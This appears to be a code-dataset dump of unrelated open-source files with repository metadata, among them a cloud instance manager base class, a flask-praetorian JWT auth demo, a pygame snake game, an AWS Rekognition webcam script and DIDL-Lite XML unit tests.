class AbstractInstanceManager(ABC):
def __init__(self, project_config: ProjectConfig, instance_config: dict, fork_id: Optional[str] = None):
self._project_config = project_config
self._instance_config = self._get_instance_config(instance_config)
self._fork_id = fork_id
@abstractmethod
def _get_instance_config(self, config: dict) -> AbstractInstanceConfig:
"""A factory method to create a provider's instance config."""
raise NotImplementedError
@abstractmethod
def is_running(self):
"""Checks if the instance is running."""
raise NotImplementedError
@abstractmethod
def start(self, output: AbstractOutputWriter, dry_run=False):
"""Creates a stack with the instance."""
raise NotImplementedError
@abstractmethod
def stop(self, output: AbstractOutputWriter):
"""Deletes the stack."""
raise NotImplementedError
@abstractmethod
def clean(self, output: AbstractOutputWriter):
"""Deletes the stack."""
raise NotImplementedError
@abstractmethod
def sync(self, output: AbstractOutputWriter, dry_run=False):
"""Synchronizes the project code with the instance."""
raise NotImplementedError
@abstractmethod
def download(self, download_filters: list, output: AbstractOutputWriter, dry_run=False):
"""Downloads files from the instance."""
raise NotImplementedError
@abstractmethod
def get_status_text(self) -> str:
"""Returns information about the started instance.
It will be shown to the user once the instance is started and by using the "status" command.
"""
raise NotImplementedError
@abstractmethod
def get_public_ip_address(self) -> str:
"""Returns a public IP address of the running instance."""
raise NotImplementedError
def get_ip_address(self):
"""Returns an IP address that will be used for SSH connections."""
if self._instance_config.local_ssh_port:
return '127.0.0.1'
public_ip_address = self.get_public_ip_address()
if not public_ip_address:
raise ValueError('The running instance doesn\'t have a public IP address.\n'
'Use the "localSshPort" parameter if you want to create a tunnel to the instance.')
return public_ip_address
@property
def ssh_port(self) -> int:
if self._instance_config.local_ssh_port:
return self._instance_config.local_ssh_port
return 22
@property
@abstractmethod
def ssh_user(self) -> str:
raise NotImplementedError
@property
@abstractmethod
def ssh_key_path(self) -> str:
raise NotImplementedError
@property
def project_config(self) -> ProjectConfig:
return self._project_config
@property
def instance_config(self) -> AbstractInstanceConfig:
return self._instance_config
@property
def fork_id(self) -> Optional[str]:
return self._fork_id
| 32.173077
| 112
| 0.69217
|
9142980c2ecb3dd382e797858495d2f7ace30de5
| 414
|
py
|
Python
|
recursion/harmonic_sum.py
|
JunzhongLin/leetcode_practice
|
47b2f5cc3c87de004ae21a94024e751b40b8f559
|
[
"MIT"
] | null | null | null |
recursion/harmonic_sum.py
|
JunzhongLin/leetcode_practice
|
47b2f5cc3c87de004ae21a94024e751b40b8f559
|
[
"MIT"
] | null | null | null |
recursion/harmonic_sum.py
|
JunzhongLin/leetcode_practice
|
47b2f5cc3c87de004ae21a94024e751b40b8f559
|
[
"MIT"
] | null | null | null |
'''
Write a Python program to calculate the harmonic sum of n-1. Go to the editor
Note: The harmonic sum is the sum of reciprocals of the positive integers.
Example : 1+ 1/2 +1/3 .....
'''
class Solution:
def harmonic_sum(self, num):
if num == 1:
return 1
else:
return 1/num + self.harmonic_sum(num-1)
if __name__ == '__main__':
res = Solution().harmonic_sum(4)
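    # Hedged addition (not in the original): cross-check the recursion against an
    # explicit sum and show the result; n=4 is an arbitrary illustrative choice.
    assert abs(res - sum(1 / k for k in range(1, 5))) < 1e-12
    print(res)  # 1 + 1/2 + 1/3 + 1/4 = 2.0833...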
| 23
| 77
| 0.620773
|
9f0811a052b044c5c97a37913b78c7dbaf3505ad
| 492
|
gyp
|
Python
|
library/boost-typeof/1.62.0.gyp
|
KjellSchubert/bru
|
dd70b721d07fbd27c57c845cc3a29cd8f2dfc587
|
[
"MIT"
] | 3
|
2015-01-06T15:22:16.000Z
|
2015-11-27T18:13:04.000Z
|
library/boost-typeof/1.62.0.gyp
|
KjellSchubert/bru
|
dd70b721d07fbd27c57c845cc3a29cd8f2dfc587
|
[
"MIT"
] | 7
|
2015-02-10T15:13:38.000Z
|
2021-05-30T07:51:13.000Z
|
library/boost-typeof/1.62.0.gyp
|
KjellSchubert/bru
|
dd70b721d07fbd27c57c845cc3a29cd8f2dfc587
|
[
"MIT"
] | 3
|
2015-01-29T17:19:53.000Z
|
2016-01-06T12:50:06.000Z
|
{
"targets": [
{
"target_name": "boost-typeof",
"type": "none",
"dependencies": [
"../boost-mpl-type_traits-typeof-utility/boost-mpl-type_traits-typeof-utility.gyp:boost-mpl-type_traits-typeof-utility"
],
"export_dependent_settings": [
"../boost-mpl-type_traits-typeof-utility/boost-mpl-type_traits-typeof-utility.gyp:boost-mpl-type_traits-typeof-utility"
]
}
]
}
| 32.8
| 135
| 0.552846
|
5d1941a2e3500908ca7577304511fb8b684716ec
| 171
|
py
|
Python
|
pythonteste/Aula17.3.py
|
RodrigoPasini/PYTHON
|
e114390091fedb03bf25a56a671da6186d6bfcae
|
[
"MIT"
] | null | null | null |
pythonteste/Aula17.3.py
|
RodrigoPasini/PYTHON
|
e114390091fedb03bf25a56a671da6186d6bfcae
|
[
"MIT"
] | null | null | null |
pythonteste/Aula17.3.py
|
RodrigoPasini/PYTHON
|
e114390091fedb03bf25a56a671da6186d6bfcae
|
[
"MIT"
] | null | null | null |
valores=list()
for c in range(0,5):
    valores.append(int(input("Enter a value: ")))
for c, v in enumerate(valores):
print(f"N posição {c} encontrei o valor {v}.")
| 28.5
| 51
| 0.654971
|
690d0d2dd9565ed78d3b94a90c188fc110d0314c
| 4,430
|
py
|
Python
|
backend/app/extensions/auth_praeto.py
|
breachr/breachr_homepage
|
a781da4056ca5527069ca2b7069aeaddb2196ca0
|
[
"MIT"
] | null | null | null |
backend/app/extensions/auth_praeto.py
|
breachr/breachr_homepage
|
a781da4056ca5527069ca2b7069aeaddb2196ca0
|
[
"MIT"
] | null | null | null |
backend/app/extensions/auth_praeto.py
|
breachr/breachr_homepage
|
a781da4056ca5527069ca2b7069aeaddb2196ca0
|
[
"MIT"
] | null | null | null |
import flask
import flask_praetorian
import flask_cors
from app import db
from app import app
guard = flask_praetorian.Praetorian()
cors = flask_cors.CORS()
# A generic ProtectedUser model that might be used by an app powered by flask-praetorian
class ProtectedUser(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.Text, unique=True)
password = db.Column(db.Text)
roles = db.Column(db.Text)
is_active = db.Column(db.Boolean, default=True, server_default='true')
@property
def rolenames(self):
try:
return self.roles.split(',')
except Exception:
return []
@classmethod
def lookup(cls, username):
return cls.query.filter_by(username=username).one_or_none()
@classmethod
def identify(cls, id):
return cls.query.get(id)
@property
def identity(self):
return self.id
def is_valid(self):
return self.is_active
app.config['SECRET_KEY'] = 'top secret'
app.config['JWT_ACCESS_LIFESPAN'] = {'hours': 24}
app.config['JWT_REFRESH_LIFESPAN'] = {'days': 30}
# Initialize the flask-praetorian instance for the app
guard.init_app(app, ProtectedUser)
# Initializes CORS so that the api_tool can talk to the example app
cors.init_app(app)
# Add users for the example
# with app.app_context():
# # db.create_all()
# db.session.add(ProtectedUser(
# username='TheDude',
# password=guard.hash_password('abides'),
# ))
# db.session.add(ProtectedUser(
# username='Walter',
# password=guard.hash_password('calmerthanyouare'),
# roles='admin'
# ))
# db.session.add(ProtectedUser(
# username='Donnie',
# password=guard.hash_password('iamthewalrus'),
# roles='operator'
# ))
# db.session.add(ProtectedUser(
# username='Maude',
# password=guard.hash_password('andthorough'),
# roles='operator,admin'
# ))
# db.session.commit()
# Set up some routes for the example
@app.route('/login', methods=['POST'])
def login():
"""
Logs a user in by parsing a POST request containing user credentials and
issuing a JWT token.
.. example::
$ curl http://localhost:5000/login -X POST \
-d '{"username":"Walter","password":"calmerthanyouare"}'
"""
req = flask.request.get_json(force=True)
username = req.get('username', None)
password = req.get('password', None)
user = guard.authenticate(username, password)
ret = {'access_token': guard.encode_jwt_token(user)}
return (flask.jsonify(ret), 200)
@app.route('/protected')
@flask_praetorian.auth_required
def protected():
"""
A protected endpoint. The auth_required decorator will require a header
containing a valid JWT
.. example::
$ curl http://localhost:5000/protected -X GET \
-H "Authorization: Bearer <your_token>"
"""
return flask.jsonify(message='protected endpoint (allowed user {})'.format(
flask_praetorian.current_user().username,
))
@app.route('/protected_admin_required')
@flask_praetorian.roles_required('admin')
def protected_admin_required():
"""
A protected endpoint that requires a role. The roles_required decorator
will require that the supplied JWT includes the required roles
.. example::
$ curl http://localhost:5000/protected_admin_required -X GET \
-H "Authorization: Bearer <your_token>"
"""
return flask.jsonify(
message='protected_admin_required endpoint (allowed user {})'.format(
flask_praetorian.current_user().username,
)
)
@app.route('/protected_operator_accepted')
@flask_praetorian.roles_accepted('operator', 'admin')
def protected_operator_accepted():
"""
A protected endpoint that accepts any of the listed roles. The
roles_accepted decorator will require that the supplied JWT includes at
least one of the accepted roles
.. example::
$ curl http://localhost/protected_operator_accepted -X GET \
-H "Authorization: Bearer <your_token>"
"""
return flask.jsonify(
        message='protected_operator_accepted endpoint (allowed user {})'.format(
flask_praetorian.current_user().username,
)
)
| 31.197183
| 89
| 0.64447
|
c53c8f75539389ef4a672703f585e08d52c98a18
| 9,794
|
py
|
Python
|
snake_and_priest.py
|
emadflash/snake_and_priest
|
97eac807dde2b260e5785877bfaf4d9d70a070fc
|
[
"Unlicense"
] | null | null | null |
snake_and_priest.py
|
emadflash/snake_and_priest
|
97eac807dde2b260e5785877bfaf4d9d70a070fc
|
[
"Unlicense"
] | null | null | null |
snake_and_priest.py
|
emadflash/snake_and_priest
|
97eac807dde2b260e5785877bfaf4d9d70a070fc
|
[
"Unlicense"
] | null | null | null |
import enum
from dataclasses import dataclass
import time
import pygame
class Direction(enum.Enum):
Right = 1
Left = 2
Up = 3
Down = 4
@dataclass
class Position:
x: int
y: int
def MoveUp(self, limit):
self.x -= 1
if self.x < 0:
self.x = limit - 1
def MoveDown(self, limit):
self.x += 1
if self.x >= limit:
self.x = 0
def MoveLeft(self, limit):
self.y -= 1
if self.y < 0:
self.y = limit - 1
def MoveRight(self, limit):
self.y += 1
        if self.y >= limit:
self.y = 0
def __gt__(self, other):
if self.x == other.x:
return self.y > other.y
else:
return self.x > other.x
def __eq__(self, other):
if self.x == other.x and self.y == other.y:
return True
else:
return False
class Snake:
def __init__(self, name, start, end):
self.name: str = name
self.start: Position = start
self.end: Position = end
self.cells = []
self.direction: Direction
if self.start.x == self.end.x:
if self.start.y > self.end.y:
self.direction = Direction.Right
else:
self.direction = Direction.Left
else:
if self.start.x > self.end.x:
self.direction = Direction.Down
else:
self.direction = Direction.Up
self.init_cells()
def init_cells(self) -> None:
if self.direction == Direction.Up:
if self.start.x > self.end.x:
count = abs((self.start.x - self.end.x) - board_size)
for i in range(1, count):
new_x = (self.start.x + i) % board_size
self.cells.append(Position(new_x, self.start.y))
else:
count = self.end.x - self.start.x
for i in range(1, count):
new_x = (self.start.x + i)
self.cells.append(Position(new_x, self.start.y))
elif self.direction == Direction.Down:
if self.start.x < self.end.x:
count = abs((self.end.x - self.start.x) - board_size)
for i in range(1, count):
new_x = (self.end.x + i) % board_size
                    self.cells.append(Position(new_x, self.start.y))
else:
count = self.start.x - self.end.x
for i in range(1, count):
new_x = (self.end.x + i)
self.cells.append(Position(new_x, self.start.y))
elif self.direction == Direction.Right:
if self.start.y < self.end.y:
count = abs((self.start.y - self.end.y) - board_size)
for i in range(1, count):
new_y = (self.start.y + i) % board_size
self.cells.append(Position(self.start.x, new_y))
else:
count = self.start.y - self.end.y
for i in range(1, count):
new_y = (self.start.y + i)
self.cells.append(Position(self.start.x, new_y))
elif self.direction == Direction.Left:
if self.start.y > self.end.y:
count = abs((self.start.y - self.end.y) - board_size)
for i in range(1, count):
new_y = (self.start.y + i) % board_size
self.cells.append(Position(self.start.x, new_y))
else:
count = self.end.y - self.start.y
for i in range(1, count):
new_y = (self.start.y + i)
self.cells.append(Position(self.start.x, new_y))
def check_collision(self, pos: Position) -> bool:
return bool(self.start == pos or self.end == pos or pos in self.cells)
def __str__(self):
return f"""
{self.name}
start: ({self.start.x} {self.start.y})
end: ({self.end.x}, {self.end.y})
Direction: {self.direction}
Cells: {self.cells}
"""
class Priest:
def __init__(self, pos, direction):
self.pos: Position = pos
self.direction: Direction = direction
def init_board():
size = int(input())
return size * [size * [0]]
def init_snakes():
snakes = []
snakes_count = int(input())
def getPos(lst):
return list(map(lambda x: x - 1, map(int, lst)))
for _ in range(snakes_count):
s = input().split(' ')
start_pos = getPos(s[1].split(','))
end_pos = getPos(s[2].split(','))
snakes.append(Snake(s[0],
Position(start_pos[0], start_pos[1]),
Position(end_pos[0], end_pos[1]),
))
return snakes
def print_snakes(snakes) -> None:
for i in snakes:
print(i)
def init_priest(board_size) -> (Priest, Position):
pos: Position
respective_end: Position
direction: Position
data = input()
d = data[0]
start = int(data[1])
if d == 'W':
pos = Position(start - 1, 0)
direction = Direction.Right
respective_end = Position(start - 1, board_size - 1)
elif d == 'E':
        pos = Position(start - 1, board_size - 1)  # start at the east edge
direction = Direction.Left
respective_end = Position(start - 1, 0)
elif d == 'N':
pos = Position(0, start - 1)
direction = Direction.Down
respective_end = Position(board_size - 1, start - 1)
elif d == 'S':
pos = Position(board_size - 1, start - 1)
direction = Direction.Up
respective_end = Position(0, start - 1)
return (Priest(pos, direction), respective_end)
def update_snakes(snakes, board_size):
for i in snakes:
if i.direction == Direction.Up:
i.start.MoveUp(board_size)
i.end.MoveUp(board_size)
for i in i.cells:
i.MoveUp(board_size);
elif i.direction == Direction.Down:
i.start.MoveDown(board_size)
i.end.MoveDown(board_size)
for i in i.cells:
i.MoveDown(board_size);
elif i.direction == Direction.Left:
i.start.MoveLeft(board_size)
i.end.MoveLeft(board_size)
for i in i.cells:
i.MoveLeft(board_size);
elif i.direction == Direction.Right:
i.start.MoveRight(board_size)
i.end.MoveRight(board_size)
for i in i.cells:
i.MoveRight(board_size);
return snakes
def update_priest(priest):
if priest.direction == Direction.Up:
priest.pos.x -= 1
elif priest.direction == Direction.Down:
priest.pos.x += 1
elif priest.direction == Direction.Right:
priest.pos.y += 1
elif priest.direction == Direction.Left:
priest.pos.y -= 1
return priest
class Game:
def __init__(self, rows, cols, snakes, priest, win_pos):
self.snakes = snakes
self.priest = priest
self.win_pos = win_pos
self.rows = rows
self.cols = cols
self.__fps = 60
self.height = 600
self.width = 600
pygame.init()
self.WIN = pygame.display.set_mode((self.height, self.width))
pygame.display.set_caption('snake and a priest')
self.blockSize = self.get_blk_size()
def get_blk_size(self):
return int(self.height / self.rows)
def render_snakes(self):
for snake in self.snakes:
r = pygame.Rect(snake.start.y* self.blockSize, snake.start.x* self.blockSize, self.blockSize, self.blockSize)
pygame.draw.rect(self.WIN, (3, 123, 123), r, 0)
r = pygame.Rect(snake.end.y* self.blockSize, snake.end.x* self.blockSize, self.blockSize, self.blockSize)
pygame.draw.rect(self.WIN, (3, 123, 123), r, 0)
for i in snake.cells:
r = pygame.Rect(i.y* self.blockSize, i.x* self.blockSize, self.blockSize, self.blockSize)
pygame.draw.rect(self.WIN, (3, 123, 123), r, 0)
update_snakes(self.snakes, 10)
pygame.display.flip()
def render_priest(self):
r = pygame.Rect(self.priest.pos.y* self.blockSize, self.priest.pos.x* self.blockSize, self.blockSize, self.blockSize)
pygame.draw.rect(self.WIN, (0, 0, 255), r, 0)
update_priest(self.priest)
pygame.display.flip()
def run(self):
run = True
clock = pygame.time.Clock()
tick = 0
self.WIN.fill((0, 255, 0))
self.render_snakes()
self.render_priest()
bittenBy = None
while run:
clock.tick(self.__fps)
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
continue
if tick == self.__fps:
if self.priest.pos == self.win_pos:
run = False
for snake in self.snakes:
if snake.check_collision(self.priest.pos):
bittenBy = snake
run = False
continue
self.render_snakes()
self.render_priest()
tick = 0
else:
tick += 1
self.WIN.fill((0, 255, 0))
pygame.quit()
if bittenBy is None:
print("NIRVANAN")
else:
print(bittenBy.name, self.priest.pos)
def main():
    # board_size is read inside Snake.init_cells as a module-level name,
    # so declare it global here to avoid a NameError.
    global board_size
    board = init_board()
    board_size = len(board)
snakes = init_snakes()
priest, respective_end = init_priest(len(board))
game = Game(10, 10, snakes, priest, respective_end)
game.run()
if __name__ == '__main__':
main()
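# --- Hedged example input (not part of the original script) ---
# The parsers above read the game setup from stdin; the values here are
# illustrative only:
#
#   10                  board size (init_board)
#   2                   number of snakes (init_snakes)
#   cobra 1,1 1,4       name, start "row,col", end "row,col", 1-based (init_snakes)
#   viper 5,2 8,2
#   W3                  priest: edge letter N/S/E/W plus a 1-based offset (init_priest)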
| 29.411411
| 125
| 0.52573
|
92e90b500501014a2b7171f4e2e5a037812447a1
| 910
|
py
|
Python
|
AIonAWS/aws_image_recognition.py
|
ankit98040/AWS
|
8f3459592193c3daa5310a91b3462a74ed968835
|
[
"Apache-2.0"
] | 1
|
2021-03-17T07:28:50.000Z
|
2021-03-17T07:28:50.000Z
|
AIonAWS/aws_image_recognition.py
|
ankit98040/AWS
|
8f3459592193c3daa5310a91b3462a74ed968835
|
[
"Apache-2.0"
] | null | null | null |
AIonAWS/aws_image_recognition.py
|
ankit98040/AWS
|
8f3459592193c3daa5310a91b3462a74ed968835
|
[
"Apache-2.0"
] | null | null | null |
#webcam photo click
import cv2
import boto3
cap = cv2.VideoCapture(0)
#activates the camera
#0 for internal webcam, 1 for any external web cam
myphoto = "ankit.jpg"
ret , photo = cap.read()
#clicks the photo
#print(ret)
cv2.imwrite(myphoto, photo)
cap.release()
#releases the camera
#uploading image to s3
region = "ap-southeast-1"
bucket = "aiawsankit"
s3 = boto3.resource('s3')
s3.Bucket(bucket).upload_file(myphoto, "file.jpg")
#connect rek: ask for method
rek = boto3.client('rekognition', region)
#client => resource
#but resource only has a few service so for other services, we use client
upimage = "file.jpg"
response = rek.detect_labels(
Image={
'S3Object': {
'Bucket': bucket,
'Name': upimage
}
},
MaxLabels=10,
MinConfidence=50
)
#response
# Print at most the first five detected labels (there may be fewer than five)
for label in response['Labels'][:5]:
    print(label['Name'])
| 25.277778
| 73
| 0.648352
|
2595ea9d34fc54285d10ab72ffea0a94b745970e
| 21,784
|
py
|
Python
|
tests/test_didl_lite.py
|
chishm/python-didl-lite
|
ace0e134f7759c766d455f33c3cef552067fa799
|
[
"Apache-2.0"
] | null | null | null |
tests/test_didl_lite.py
|
chishm/python-didl-lite
|
ace0e134f7759c766d455f33c3cef552067fa799
|
[
"Apache-2.0"
] | null | null | null |
tests/test_didl_lite.py
|
chishm/python-didl-lite
|
ace0e134f7759c766d455f33c3cef552067fa799
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Unit tests for didl_lite."""
from defusedxml import ElementTree as ET # type: ignore
from didl_lite import didl_lite
NAMESPACES = {
"didl_lite": "urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/",
"dc": "http://purl.org/dc/elements/1.1/",
"upnp": "urn:schemas-upnp-org:metadata-1-0/upnp/",
"xsi": "http://www.w3.org/2001/XMLSchema-instance",
}
class TestDidlLite:
"""Tests for didl_lite."""
def test_item_from_xml(self) -> None:
"""Test item from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<item id="0" parentID="0" restricted="1">
<dc:title>Audio Item Title</dc:title>
<upnp:class>object.item.audioItem</upnp:class>
<dc:language>English</dc:language>
<res protocolInfo="protocol_info">url</res>
</item>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
item = items[0]
assert item.xml_el is not None
assert getattr(item, "title") == "Audio Item Title"
assert getattr(item, "upnp_class") == "object.item.audioItem"
assert getattr(item, "language") == "English"
assert isinstance(item, didl_lite.AudioItem)
assert not hasattr(item, "non_existing")
resources = item.res
assert len(resources) == 1
resource = resources[0]
assert resource.xml_el is not None
assert resource.protocol_info == "protocol_info"
assert resource.uri == "url"
assert not hasattr(item, "non_existing")
assert item.res == item.resources
def test_item_from_xml_not_strict(self) -> None:
"""Test item from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<item id="0" parentID="0" restricted="1">
<dc:title>Audio Item Title</dc:title>
<upnp:class>object.item.audioItem</upnp:class>
<dc:language>English</dc:language>
<res>url</res>
</item>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string, strict=False)
assert len(items) == 1
item = items[0]
assert item.xml_el is not None
assert getattr(item, "title") == "Audio Item Title"
assert getattr(item, "upnp_class") == "object.item.audioItem"
assert getattr(item, "language") == "English"
assert isinstance(item, didl_lite.AudioItem)
assert not hasattr(item, "non_existing")
resources = item.res
assert len(resources) == 1
resource = resources[0]
assert resource.xml_el is not None
assert resource.protocol_info is None # This is now allowed with strict=False
assert resource.uri == "url"
assert not hasattr(item, "non_existing")
assert item.res == item.resources
def test_item_to_xml(self) -> None:
"""Test item to XML."""
resource = didl_lite.Resource("url", "protocol_info")
items = [
didl_lite.AudioItem(
id="0",
parent_id="0",
title="Audio Item Title",
restricted="1",
resources=[resource],
language="English",
),
]
didl_string = didl_lite.to_xml_string(*items).decode("utf-8")
assert 'xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"' in didl_string
assert 'xmlns:dc="http://purl.org/dc/elements/1.1/"' in didl_string
assert 'xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"' in didl_string
assert 'xmlns:sec="http://www.sec.co.kr/"' in didl_string
assert 'xmlns:ns1="urn:schemas-upnp-org:metadata-1-0/upnp/"' not in didl_string
didl_el = ET.fromstring(didl_string)
item_el = didl_el.find("./didl_lite:item", NAMESPACES)
assert item_el is not None
assert item_el.attrib["id"] == "0"
assert item_el.attrib["parentID"] == "0"
assert item_el.attrib["restricted"] == "1"
title_el = item_el.find("./dc:title", NAMESPACES)
assert title_el is not None
assert title_el.text == "Audio Item Title"
class_el = item_el.find("./upnp:class", NAMESPACES)
assert class_el is not None
assert class_el.text == "object.item.audioItem"
language_el = item_el.find("./dc:language", NAMESPACES)
assert language_el is not None
assert language_el.text == "English"
res_el = item_el.find("./didl_lite:res", NAMESPACES)
assert res_el is not None
assert res_el.attrib["protocolInfo"] == "protocol_info"
assert res_el.text == "url"
def test_item_repr(self) -> None:
"""Test item's repr can convert back to an equivalent item."""
        # repr method doesn't know how the package was imported, so it only uses class names
from didl_lite.didl_lite import AudioItem, Resource
item = AudioItem(
id="0",
parent_id="0",
title="Audio Item Title",
restricted="1",
res=[
Resource("url", "protocol_info"),
Resource("url2", "protocol_info2"),
],
language="English",
)
item_repr = repr(item)
item_remade = eval(item_repr)
assert ET.tostring(item.to_xml()) == ET.tostring(item_remade.to_xml())
def test_container_from_xml(self) -> None:
"""Test container from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<container id="0" parentID="0" restricted="1">
<dc:title>Album Container Title</dc:title>
<upnp:class>object.container.album</upnp:class>
<item id="1" parentID="0" restricted="1">
<dc:title>Audio Item Title</dc:title>
<upnp:class>object.item.audioItem</upnp:class>
<dc:language>English</dc:language>
<res protocolInfo="protocol_info">url</res>
</item>
</container>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
container = items[0]
assert container.xml_el is not None
assert isinstance(container, didl_lite.Container)
assert getattr(container, "title") == "Album Container Title"
assert getattr(container, "upnp_class") == "object.container.album"
item = container[0]
assert item.xml_el is not None
assert item.title == "Audio Item Title"
assert item.upnp_class == "object.item.audioItem"
assert item.language == "English"
resources = item.res
assert len(resources) == 1
resource = resources[0]
assert resource.xml_el is not None
assert resource.protocol_info == "protocol_info"
assert resource.uri == "url"
assert item.res == item.resources
def test_container_to_xml(self) -> None:
"""Test container to XML."""
container = didl_lite.Album(
id="0", parent_id="0", title="Audio Item Title", restricted="1"
)
resource = didl_lite.Resource("url", "protocol_info")
item = didl_lite.AudioItem(
id="0",
parent_id="0",
title="Audio Item Title",
restricted="1",
resources=[resource],
language="English",
)
container.append(item)
didl_string = didl_lite.to_xml_string(container).decode("utf-8")
didl_el = ET.fromstring(didl_string)
container_el = didl_el.find("./didl_lite:container", NAMESPACES)
assert container_el is not None
assert container_el.attrib["id"] == "0"
assert container_el.attrib["parentID"] == "0"
assert container_el.attrib["restricted"] == "1"
item_el = container_el.find("./didl_lite:item", NAMESPACES)
assert item_el is not None
assert item_el.attrib["id"] == "0"
assert item_el.attrib["parentID"] == "0"
assert item_el.attrib["restricted"] == "1"
title_el = item_el.find("./dc:title", NAMESPACES)
assert title_el is not None
assert title_el.text == "Audio Item Title"
class_el = item_el.find("./upnp:class", NAMESPACES)
assert class_el is not None
assert class_el.text == "object.item.audioItem"
language_el = item_el.find("./dc:language", NAMESPACES)
assert language_el is not None
assert language_el.text == "English"
res_el = item_el.find("./didl_lite:res", NAMESPACES)
assert res_el is not None
assert res_el.attrib["protocolInfo"] == "protocol_info"
assert res_el.text == "url"
def test_container_repr(self) -> None:
"""Test containers's repr can convert back to an equivalent container."""
from didl_lite.didl_lite import Album, AudioItem, Resource
container = Album(
id="0", parent_id="0", title="Audio Item Title", restricted="1"
)
resource = Resource("url", "protocol_info")
item = AudioItem(
id="0",
parent_id="0",
title="Audio Item Title",
restricted="1",
resources=[resource],
language="English",
)
container.append(item)
container_repr = repr(container)
container_remade = eval(container_repr)
assert ET.tostring(container.to_xml()) == ET.tostring(container_remade.to_xml())
def test_descriptor_from_xml_root(self) -> None:
"""Test root descriptor from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<desc id="1" nameSpace="ns" type="type">Text</desc>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
descriptor = items[0]
assert descriptor is not None
assert descriptor.xml_el is not None
assert getattr(descriptor, "id") == "1"
assert getattr(descriptor, "name_space") == "ns"
assert getattr(descriptor, "type") == "type"
assert getattr(descriptor, "text") == "Text"
def test_descriptor_from_xml_item(self) -> None:
"""Test item descriptor from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<item id="1" parentID="0" restricted="1">
<dc:title>Audio Item Title</dc:title>
<upnp:class>object.item.audioItem</upnp:class>
<dc:language>English</dc:language>
<res protocolInfo="protocol_info">url</res>
<desc id="1" nameSpace="ns" type="type">Text</desc>
</item>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
item = items[0]
assert item is not None
assert isinstance(item, didl_lite.AudioItem)
descriptor = item.descriptors[0]
assert descriptor is not None
assert descriptor.xml_el is not None
assert descriptor.id == "1"
assert descriptor.name_space == "ns"
assert descriptor.type == "type"
assert descriptor.text == "Text"
def test_descriptor_from_xml_container(self) -> None:
"""Test container descriptor from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<container id="0" parentID="0" restricted="1">
<dc:title>Album Container Title</dc:title>
<upnp:class>object.container.album</upnp:class>
<desc id="1" nameSpace="ns" type="type">Text</desc>
</container>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
container = items[0]
assert container is not None
assert container.xml_el is not None
assert isinstance(container, didl_lite.Container)
descriptor = container.descriptors[0]
assert descriptor is not None
assert descriptor.xml_el is not None
assert descriptor.id == "1"
assert descriptor.name_space == "ns"
assert descriptor.type == "type"
assert descriptor.text == "Text"
def test_descriptor_from_xml_container_item(self) -> None:
"""Test item descriptor in container from XML."""
didl_string = """
<DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:sec="http://www.sec.co.kr/">
<container id="0" parentID="0" restricted="1">
<dc:title>Album Container Title</dc:title>
<upnp:class>object.container.album</upnp:class>
<item id="1" parentID="0" restricted="1">
<dc:title>Audio Item Title</dc:title>
<upnp:class>object.item.audioItem</upnp:class>
<dc:language>English</dc:language>
<res protocolInfo="protocol_info">url</res>
<desc id="1" nameSpace="ns" type="type">Text</desc>
</item>
</container>
</DIDL-Lite>"""
items = didl_lite.from_xml_string(didl_string)
assert len(items) == 1
container = items[0]
assert container is not None
assert isinstance(container, didl_lite.Container)
item = container[0]
assert item is not None
descriptor = item.descriptors[0]
assert descriptor is not None
assert descriptor.xml_el is not None
assert descriptor.id == "1"
assert descriptor.name_space == "ns"
assert descriptor.type == "type"
assert descriptor.text == "Text"
def test_descriptor_to_xml(self) -> None:
"""Test descriptor to XML."""
descriptor = didl_lite.Descriptor(
id="1", name_space="ns", type="type", text="Text"
)
item = didl_lite.AudioItem(
id="0",
parent_id="0",
title="Audio Item Title",
restricted="1",
language="English",
descriptors=[descriptor],
)
didl_string = didl_lite.to_xml_string(item).decode("utf-8")
didl_el = ET.fromstring(didl_string)
item_el = didl_el.find("./didl_lite:item", NAMESPACES)
assert item_el is not None
